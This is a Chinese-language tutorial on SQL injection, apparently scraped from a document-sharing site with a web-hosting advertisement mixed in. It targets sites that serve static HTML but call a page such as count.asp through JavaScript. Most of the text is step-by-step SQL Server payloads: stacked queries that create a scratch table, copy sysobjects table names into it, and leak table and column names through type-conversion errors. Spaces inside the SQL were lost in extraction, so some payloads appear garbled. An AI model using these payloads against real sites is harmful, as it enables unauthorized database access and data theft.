sql注入的另类方法介绍

《sql注入的另类方法介绍》由会员上传分享，免费在线阅读，更多相关内容在行业资料-天天文库。

1、SQL注入的另类方法介绍       Sql一种对关系数据库中的数据进行定义和操作的句法，为大多数关系数据库管理系统所支持的工业标准。那么对于sql注入的方法站长们是否了解呢？专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps主机、服务器租用的中国信息港来为你详细介绍！ 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担，提高访问速度。二来也阻止了SQL注入式的攻击。大家在是否碰到过这样的站点：　　全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来

2、可以减轻服务器负担，提高访问速度。二来也阻止了SQL注入式的攻击。　　我来说说他们的文章系统原理：全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。　　攻击方法：      查看源文件/看里面是否有通过JS来调用的页面。　　如调用来更新文章的浏览次数。　　我们就可以这样来试一下可否注入：　　http://服务器域名/count.asp?id=1552'　　看一下是否出错。如出错说明有注入漏洞。然后正常攻击。　　在本机建立一下post.htm的文件和log.txt的文本文件(用来记录用，这是一个

3、好习惯)　　post.htm内容：主要是方便输入。　　对于SQLSERVER的服务器可以这样判断：在1552后加一分号，如正常有可能是SQLSERVER　　对于这类数据库可以先建一个表id=1552;createtableaaa(aaachar(20));--　　然后插入一条记录：id=1552;insertintoaaavalues('test');--　　再之后枚举出他的数据表名：　　id=1552;updateaaasetaaa=(selecttop1namefromsysobjectswherexty

4、pe='u'andstatus>0);--　　这是将第一个表名更新到aaa的字段处。　　id=1552andexists(select*fromaaawhereaaa>5)就会报错，多数情况会将表名直接读出：看：　　MicrosoftOLEDBProviderforSQLServer错误'80040e07'　　将varchar值'vote'转换为数据类型为int的列时发生语法错误。　　/search.asp，行21　　其中vote就是表名：　　也可以先猜出一个表名，再把(selecttop1namefroms

5、ysobjectswherextype='u'andstatus>0)的值更新到那个表的一条记录中去。通过网页显示。　　读出第一个表，第二个表可以这样读出来(在条件后加上andname<>'刚才得到的表名')。　　id=1552;updateaaasetaaa=(selecttop1namefromsysobjectswherextype='u'andstatus>0andname<>'vote');--　　然后id=1552andexists(select*fromaaawhereaaa>5)　　读出第二个

6、表，^^^^^^一个个的读出，直到没有为止。　　读字段是这样：　　id=1552;updateaaasetaaa=(selecttop1col_name(object_id('表名'),1));--　　然后id=1552andexists(select*fromaaawhereaaa>5)出错，得到字段名　　id=1552;updateaaasetaaa=(selecttop1col_name(object_id('表名'),2));--　　然后id=1552andexists(select*fromaaaw

7、hereaaa>5)出错，得到字段名……类推中国信息港--服务器租用-国内8强虚拟主机服务商.十年品牌虚拟主机和域名注册精品服务,为全球10万用户提供专业虚拟主机,域名注册,VPS主机租用,香港虚拟主机,企业邮箱服务.提供虚拟主机转入。